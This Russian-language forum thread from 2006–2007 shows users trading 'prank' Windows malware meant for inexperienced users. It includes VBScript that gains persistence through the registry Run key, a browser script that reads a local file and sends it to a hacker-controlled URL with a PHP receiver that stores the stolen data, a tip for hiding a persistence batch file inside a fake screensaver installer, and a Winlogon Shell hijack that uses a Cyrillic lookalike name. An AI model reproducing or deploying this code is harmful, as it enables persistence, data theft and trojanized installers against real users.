| Программирование |
Прикольный скрипт
,Накатал на досуге...
Дата публикации:
Love.sys, 13.02.2006 - 23:39
Вот решил побаловаться =)Вирь можно сказать простенький, Достал!.vbs
Тестим:
QUOTE
'Ваня представляет супер нарулный вирус.!!
Set WSHShell=WScript.CreateObject("WScript.Shell")
WSHShell.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\taskmgr.exe", "c:\System.bat"
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\System.bat")
xep.WriteLine "notepad.exe c:\1.txt"
xep.close
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\1.txt")
xep.WriteLine "Долбанный хеллоу ворлд!"
xep.close
Set WSHShell=WScript.CreateObject("WScript.Shell")
WSHShell.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\taskmgr.exe", "c:\System.bat"
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\System.bat")
xep.WriteLine "notepad.exe c:\1.txt"
xep.close
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\1.txt")
xep.WriteLine "Долбанный хеллоу ворлд!"
xep.close
Ну естесно всё что после "'" не учитывается.
Потом скрипт создаёт запись в реестре, в разделе run, которая
запускает System.bat на диске Ц.
Далее создаётся сам System.bat на диске Ц с произвольным
содерданием "notepad.exe c:\1.txt". Дальше больше моей фантазии... =)))
На диске Ц создаётся документ 1.txt =)))))))) с содержанием
"Долбанный хеллоу ворлд!" или по вашему желанию.
На этом, моя извращённая фантазия исчерпывается пока =))
В итоги, мы имеем после запуска скриптика
постоянный запуск блокнота при старте винды с надписью "
Долбанный хеллоу ворлд!" ухишьрения, циклы, прятанья и остальное
оставляю вам. Поиздевайтесь над не опытными сокалегами.
Например можно приписать скрипт autorun-на компакт диска,
запускающего данный скрипт vbs.
Писал, специально для новечков. Думаю всё понятно и максимально
просто, что даёт вводные знания о системе скриптов винды. Юзаем =)
Infernus, 14.02.2006 - 8:19
ггг) я когда-то что-то наподобие сего сделал, только прикол с поп-ап окнами...Love.sys, 14.02.2006 - 12:45
Можешь написать пару строк кода? =)Интересно поэксперементировать.
ZaHack, 14.02.2006 - 12:57
Все это, конечно хорошо, но давай подсчитаем сколько файлов у тебя получилось, "для маленького вируса". Сам скрипт - раз, бат-файл - один раз не пид@р@c, ой, извините,два
.Текстовый файл - три, ключ реестра - четыре. Итого 4 файла.А почему не 15 ? 
Если честно, то больше однго файла для виря уже критично много. Я уж не буду говорить, что вирь прописывается в Автозагрузку, которая сечеться Мс-конфигом, о том что каждый раз будет выскакивать ДОС-окно и т.д.Приговор:"аффтар убей сибя ап стену сразбегу"
Добавлено:
QUOTE(Гражданин @ 14.02.2006 - 0:39)
....Долбанный хеллоу ворлд!" ухишьрения, циклы, прятанья и остальное
оставляю вам. Поиздевайтесь над не опытными сокалегами....
Не легче ли написать один единственный ЕХЕшник, где и будут реализованы "ухишьрения, циклы, прятанья и остальное"??
Love.sys, 14.02.2006 - 13:13
QUOTE(ZaHack @ 14.02.2006 - 12:57)
Все это, конечно хорошо, но давай подсчитаем сколько файлов у тебя получилось, "для маленького вируса". Сам скрипт - раз, бат-файл - один раз не пид@р@c, ой, извините,два .Текстовый файл - три, ключ реестра - четыре. Итого 4 файла.А почему не 15 ? Если честно, то больше однго файла для виря уже критично много. Я уж не буду говорить, что вирь прописывается в Автозагрузку, которая сечеться Мс-конфигом, о том что каждый раз будет выскакивать ДОС-окно и т.д.
Приговор:"аффтар убей сибя ап стену сразбегу"
Не легче ли написать один единственный ЕХЕшник, где и будут реализованы "ухишьрения, циклы, прятанья и остальное"??
.Текстовый файл - три, ключ реестра - четыре. Итого 4 файла.А почему не 15 ? Если честно, то больше однго файла для виря уже критично много. Я уж не буду говорить, что вирь прописывается в Автозагрузку, которая сечеться Мс-конфигом, о том что каждый раз будет выскакивать ДОС-окно и т.д.Приговор:"аффтар убей сибя ап стену сразбегу"
Не легче ли написать один единственный ЕХЕшник, где и будут реализованы "ухишьрения, циклы, прятанья и остальное"??
Отвечаю по пунктам: =)
1) Данный вирус содержит 1 (!!!) файл, а остальные, баты и доки он создаёт сам из себя.
2) На счёт мсконфига, это ты загнул, ты думаешь рядовой Алимчк знает что такое МСКОНФИГ? или что такое реестр?
3) Дос окна не будет при запуске скрипта, так как это vbs а не бат.
А после перезагрузке ПК, уже пофигу. хыхы.
4) Я же писал: "Извращайтесь сами!!!" Есть софт, который из скриптов делает бинарники. В соответств. разделе форума ищи.
ZaHack, 14.02.2006 - 13:21
QUOTE(Гражданин @ 14.02.2006 - 14:13)
...3) Дос окна не будет при запуске скрипта, так как это vbs а не бат.
А после перезагрузке ПК, уже пофигу. хыхы.
4) Я же писал: "Извращайтесь сами!!!" Есть софт, который из скриптов делает бинарники. В соответств. разделе форума ищи....
3) ДОС-окно будет, т.к. систем.бат запускает блокнот, а при запуске систем.бат выскакивает ДОС окно (т.к. это батник
)4)"Есть софт, который из скриптов делает бинарники." -
А еще есть прямые руки, которые сразу создают бинарник, а не извращаются со скриптами
Love.sys, 14.02.2006 - 15:50
QUOTE(ZaHack @ 14.02.2006 - 13:21)
QUOTE(Гражданин @ 14.02.2006 - 14:13)
...3) Дос окна не будет при запуске скрипта, так как это vbs а не бат.
А после перезагрузке ПК, уже пофигу. хыхы.
3) ДОС-окно будет, т.к. систем.бат запускает блокнот, а при запуске систем.бат выскакивает ДОС окно (т.к. это батник
)Где логика?
ZaHack, 14.02.2006 - 19:37
QUOTE(Гражданин @ 14.02.2006 - 16:50)
Где логика?
Ты ничего не понял, проехали... Но дос-окно все равно будет, я его видел, когда твой "вирус" тестил. Ты, кстати, так и не ответил на то, что не легче ли один ЕХЕшник сделать, чем кучу vbs, bat и т.д. ?
Love.sys, 14.02.2006 - 20:05
Не легче.Рядовому Алимчику (от ламер-а) проще накатать скрипт или бинарник скомпилить? а? Ну вот. И я говорю, скрипт проще.
ZaHack, 15.02.2006 - 14:38
Ну не знаю... Мне легче бинарник накатать - и быстрее и эффективнее на алимчика действуетдымчик, 15.04.2006 - 1:34
Не знаю как в VBS'е, но в вэб-программировании при создании объекта файловой системыCODE
CreateObject("Scripting.FilesystemObject")
браузер сразу выдает предупреждение, что страница содержит небезопасный код
.И вообще Касперский определяет подобные штуки как червя и блокирует к ним доступ
.А так вот я тоже тут вечерком скриптец накатал для кражи данных с пользовательских компьютеров
CODE
<script>
var hackerHOST = 'http://some-hackers.host/exploit.php';
function deface()
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
var file = fso.openTextFile("c:\\privateInfo.txt", 1 ,true);
var fContent = '';
while (!file.AtEndOfStream)
fContent += file.ReadLine() + '<BR>';
file.Close();
var hackerURL = hackerHOST + '?fContent=' + fContent;
var xmlRequest = new ActiveXObject("Microsoft.XMLHTTP");
if (xmlRequest)
{
xmlRequest.onreadystatechange = processChange;
xmlRequest.open("GET", hackerURL, true);
xmlRequest.send();
}
}
function processChange()
{
if (xmlRequest.readyState == 4)
{
if (xmlRequest.status == 200)
{
myResponse = xmlRequest.responseXML.documentElement;
parseOutput(myResponse);
}
}
}
</SCRIPT>
<A href="javascript:void(0);" ONCLICK="javascript:deface();">ЖЫМИТЕ, ПАЖАЛУСТА, СЮДА</A>
И соответственно back-end всего этого
CODE
<?PHP
$fp = fopen('C:\stolenInformation.txt','w');
fputs($fp,$_GET["fContent"]);
fclose();
?>
Р.S. Для увода большого количества информации можно использовать POST метод при отправке данных
x-foby, 11.10.2007 - 20:44
неплохая тема у Гражданин'а, но я делал это проще:1. создаем нужный бат(к примеру:
echo off
start explorer
start c:\explorer.bat)
2. создаём ключик реестра, дав дд имя explorer.exe
3. прикрепляем это в инсталляшку - в моём случае это была заставка мисс плэйбой.
преемущества:
1. антивирь скажет о попытке проникновения в реестр, но это обычное дело при инсталле. ваш ответ - разрешить.
2. через мсконфиг видно explorer.exe
3. скан бесполезен!
de1ay, 11.10.2007 - 21:15
Можно ещё как dll`ку подгружать при старте системы. Можно, вот например, как сервис запускать... Варианты есть.
de1ay, 11.10.2007 - 21:25
walet, твой способ не прокатит вот почему:
x-foby, 12.10.2007 - 23:25
Жень, давай не будем забывать, что этот прикол расчитан на ламеров, а если кто-то и додумается залезть в мсконфиг, то отключить explorer.exe не у каждого рука поднимиться, а адрес мона сменить, кинув bat в WINDOWS\System32и соответственно адресок в самом бате и реестре подправив...
так лучше?
зы: в завершение - прокатывало))
Skiff, 2.11.2007 - 8:50
Нечто подобное несколько лет назад видел на каком то сайте.Code
var wsh=WScript.CreateObject("WScript.Shell");
WScript.Sleep("3000");
wsh.Run("notepad");
str = "вот здесь будет текст";
while(1==1)
{
WScript.Sleep("300");
for(i=0; i<str.length; i++)
{
wsh.AppActivate("Безымянный - Блокнот");
wsh.SendKeys(str.charAt(i));
WScript.Sleep("300");
}
WScript.Sleep("120000");
}
Данный скрипт как бы запускает блокнот и вбивает побуквенно строку которую вы ему зададите довольно интересный прикол.
x-foby, 3.12.2007 - 5:20
delay(0), вариант #2:пишем батник:
Цитата | Quote
reg add "hklm\software\microsoft\windows nt\currentversion\winlogon" /v Shell /t REG_SZ /d Explorer.exе /f
(!)выделенная 'е' - кириллица
Там придумываем как бы ентот батник запустить и получаем невключение Explorer'a на компе, а через диспетчер задач открывается тока проводник.
Можно конечно ещё и доступ к диспетчеру задач закрыть, чтоб в реестр не лазили, но это слишком жёстко и не только для новичков.
